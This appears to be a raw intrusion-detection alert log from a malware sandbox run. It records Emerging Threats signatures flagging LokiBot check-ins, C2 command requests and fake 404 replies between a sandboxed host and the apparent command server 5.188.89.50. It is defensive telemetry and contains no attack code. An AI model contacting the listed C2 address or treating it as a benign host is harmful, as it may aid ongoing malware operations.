                    09/28/21-06:50:52.442627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.784750TCP2025483ET TROJAN LokiBot Fake 404 Response80491955.188.89.50192.168.2.22
                    09/28/21-06:50:53.378969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.378969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.378969TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.378969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.225.188.89.50
                    09/28/21-06:50:53.741503TCP2025483ET TROJAN LokiBot Fake 404 Response80491965.188.89.50192.168.2.22
                    09/28/21-06:50:54.025805TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.025805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.025805TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.025805TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.225.188.89.50
                    09/28/21-06:50:54.384705TCP2025483ET TROJAN LokiBot Fake 404 Response80491975.188.89.50192.168.2.22
                    09/28/21-06:50:54.678868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.225.188.89.50
                    09/28/21-06:50:54.678868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.225.188.89.50
                    09/28/21-06:50:54.678868TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.225.188.89.50
                    09/28/21-06:50:54.678868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.225.188.89.50
                    09/28/21-06:50:55.031650TCP2025483ET TROJAN LokiBot Fake 404 Response80491985.188.89.50192.168.2.22
                    09/28/21-06:50:55.313486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.313486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.313486TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.313486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.225.188.89.50
                    09/28/21-06:50:55.687469TCP2025483ET TROJAN LokiBot Fake 404 Response80491995.188.89.50192.168.2.22
                    09/28/21-06:50:55.987134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.225.188.89.50
                    09/28/21-06:50:55.987134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.225.188.89.50
                    09/28/21-06:50:55.987134TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.225.188.89.50
                    09/28/21-06:50:55.987134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.225.188.89.50
                    09/28/21-06:50:56.347594TCP2025483ET TROJAN LokiBot Fake 404 Response80492005.188.89.50192.168.2.22
                    09/28/21-06:50:56.626190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.626190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.626190TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.626190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.225.188.89.50
                    09/28/21-06:50:56.996386TCP2025483ET TROJAN LokiBot Fake 404 Response80492015.188.89.50192.168.2.22
                    09/28/21-06:50:57.284758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.284758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.284758TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.284758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.225.188.89.50
                    09/28/21-06:50:57.618108TCP2025483ET TROJAN LokiBot Fake 404 Response80492025.188.89.50192.168.2.22
                    09/28/21-06:50:57.890671TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.225.188.89.50
                    09/28/21-06:50:57.890671TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.225.188.89.50
                    09/28/21-06:50:57.890671TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.225.188.89.50
                    09/28/21-06:50:57.890671TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.225.188.89.50
                    09/28/21-06:50:58.297915TCP2025483ET TROJAN LokiBot Fake 404 Response80492035.188.89.50192.168.2.22
                    09/28/21-06:50:58.583042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.583042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.583042TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.583042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.225.188.89.50
                    09/28/21-06:50:58.927285TCP2025483ET TROJAN LokiBot Fake 404 Response80492045.188.89.50192.168.2.22
                    09/28/21-06:50:59.242791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.242791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.242791TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.242791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.225.188.89.50
                    09/28/21-06:50:59.601230TCP2025483ET TROJAN LokiBot Fake 404 Response80492055.188.89.50192.168.2.22
                    09/28/21-06:50:59.885918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.225.188.89.50
                    09/28/21-06:50:59.885918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.225.188.89.50
                    09/28/21-06:50:59.885918TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.225.188.89.50
                    09/28/21-06:50:59.885918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.225.188.89.50
                    09/28/21-06:51:00.245923TCP2025483ET TROJAN LokiBot Fake 404 Response80492065.188.89.50192.168.2.22
                    09/28/21-06:51:00.541294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.899846TCP2025483ET TROJAN LokiBot Fake 404 Response80492075.188.89.50192.168.2.22
                    09/28/21-06:51:01.193570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.549927TCP2025483ET TROJAN LokiBot Fake 404 Response80492085.188.89.50192.168.2.22
                    09/28/21-06:51:01.859269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.225.188.89.50
                    09/28/21-06:51:02.235016TCP2025483ET TROJAN LokiBot Fake 404 Response80492095.188.89.50192.168.2.22
                    09/28/21-06:51:02.517045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.885141TCP2025483ET TROJAN LokiBot Fake 404 Response80492105.188.89.50192.168.2.22
                    09/28/21-06:51:03.156873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.512490TCP2025483ET TROJAN LokiBot Fake 404 Response80492115.188.89.50192.168.2.22
                    09/28/21-06:51:03.819481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.225.188.89.50
                    09/28/21-06:51:04.183722TCP2025483ET TROJAN LokiBot Fake 404 Response80492125.188.89.50192.168.2.22
                    09/28/21-06:51:04.459249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.832233TCP2025483ET TROJAN LokiBot Fake 404 Response80492135.188.89.50192.168.2.22
                    09/28/21-06:51:05.091180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.442715TCP2025483ET TROJAN LokiBot Fake 404 Response80492145.188.89.50192.168.2.22
                    09/28/21-06:51:05.699797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.225.188.89.50
                    09/28/21-06:51:06.041813TCP2025483ET TROJAN LokiBot Fake 404 Response80492155.188.89.50192.168.2.22
                    09/28/21-06:51:06.324511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.690603TCP2025483ET TROJAN LokiBot Fake 404 Response80492165.188.89.50192.168.2.22
                    09/28/21-06:51:06.958702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.225.188.89.50
                    09/28/21-06:51:07.319648TCP2025483ET TROJAN LokiBot Fake 404 Response80492175.188.89.50192.168.2.22
                    09/28/21-06:51:07.603166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.964447TCP2025483ET TROJAN LokiBot Fake 404 Response80492185.188.89.50192.168.2.22
                    09/28/21-06:51:08.233327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.589641TCP2025483ET TROJAN LokiBot Fake 404 Response80492195.188.89.50192.168.2.22
                    09/28/21-06:51:08.841041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.225.188.89.50
                    09/28/21-06:51:09.186378TCP2025483ET TROJAN LokiBot Fake 404 Response80492205.188.89.50192.168.2.22
                    09/28/21-06:51:09.444019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.822865TCP2025483ET TROJAN LokiBot Fake 404 Response80492215.188.89.50192.168.2.22
                    09/28/21-06:51:10.077283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.430120TCP2025483ET TROJAN LokiBot Fake 404 Response80492225.188.89.50192.168.2.22
                    09/28/21-06:51:10.687078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.225.188.89.50
                    09/28/21-06:51:11.051528TCP2025483ET TROJAN LokiBot Fake 404 Response80492235.188.89.50192.168.2.22
                    09/28/21-06:51:11.328729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.678843TCP2025483ET TROJAN LokiBot Fake 404 Response80492245.188.89.50192.168.2.22
                    09/28/21-06:51:11.924109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.225.188.89.50
                    09/28/21-06:51:12.290453TCP2025483ET TROJAN LokiBot Fake 404 Response80492255.188.89.50192.168.2.22
                    09/28/21-06:51:12.548479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.908386TCP2025483ET TROJAN LokiBot Fake 404 Response80492265.188.89.50192.168.2.22
                    09/28/21-06:51:13.189129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.544518TCP2025483ET TROJAN LokiBot Fake 404 Response80492275.188.89.50192.168.2.22
                    09/28/21-06:51:13.815165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.225.188.89.50
                    09/28/21-06:51:14.177796TCP2025483ET TROJAN LokiBot Fake 404 Response80492285.188.89.50192.168.2.22
                    09/28/21-06:51:14.436115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.799665TCP2025483ET TROJAN LokiBot Fake 404 Response80492295.188.89.50192.168.2.22
                    09/28/21-06:51:15.070584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.439943TCP2025483ET TROJAN LokiBot Fake 404 Response80492305.188.89.50192.168.2.22
                    09/28/21-06:51:15.726731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.225.188.89.50
                    09/28/21-06:51:16.076317TCP2025483ET TROJAN LokiBot Fake 404 Response80492315.188.89.50192.168.2.22
                    09/28/21-06:51:16.340414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.690124TCP2025483ET TROJAN LokiBot Fake 404 Response80492325.188.89.50192.168.2.22
                    09/28/21-06:51:16.959595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.225.188.89.50
                    09/28/21-06:51:17.307421TCP2025483ET TROJAN LokiBot Fake 404 Response80492335.188.89.50192.168.2.22
                    09/28/21-06:51:17.590103TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.941712TCP2025483ET TROJAN LokiBot Fake 404 Response80492345.188.89.50192.168.2.22
                    09/28/21-06:51:18.196433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.572171TCP2025483ET TROJAN LokiBot Fake 404 Response80492355.188.89.50192.168.2.22
                    09/28/21-06:51:18.836329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.225.188.89.50
                    09/28/21-06:51:19.181425TCP2025483ET TROJAN LokiBot Fake 404 Response80492365.188.89.50192.168.2.22
                    09/28/21-06:51:19.451088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.814657TCP2025483ET TROJAN LokiBot Fake 404 Response80492375.188.89.50192.168.2.22
                    09/28/21-06:51:20.085203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.478231TCP2025483ET TROJAN LokiBot Fake 404 Response80492385.188.89.50192.168.2.22
                    09/28/21-06:51:20.743376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.225.188.89.50
                    09/28/21-06:51:21.089639TCP2025483ET TROJAN LokiBot Fake 404 Response80492395.188.89.50192.168.2.22
                    09/28/21-06:51:21.360941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.718506TCP2025483ET TROJAN LokiBot Fake 404 Response80492405.188.89.50192.168.2.22
                    09/28/21-06:51:21.987188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.225.188.89.50
                    09/28/21-06:51:22.352974TCP2025483ET TROJAN LokiBot Fake 404 Response80492415.188.89.50192.168.2.22
                    09/28/21-06:51:22.613432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.999512TCP2025483ET TROJAN LokiBot Fake 404 Response80492425.188.89.50192.168.2.22
                    09/28/21-06:51:23.260701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.608755TCP2025483ET TROJAN LokiBot Fake 404 Response80492435.188.89.50192.168.2.22
                    09/28/21-06:51:23.883186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.225.188.89.50
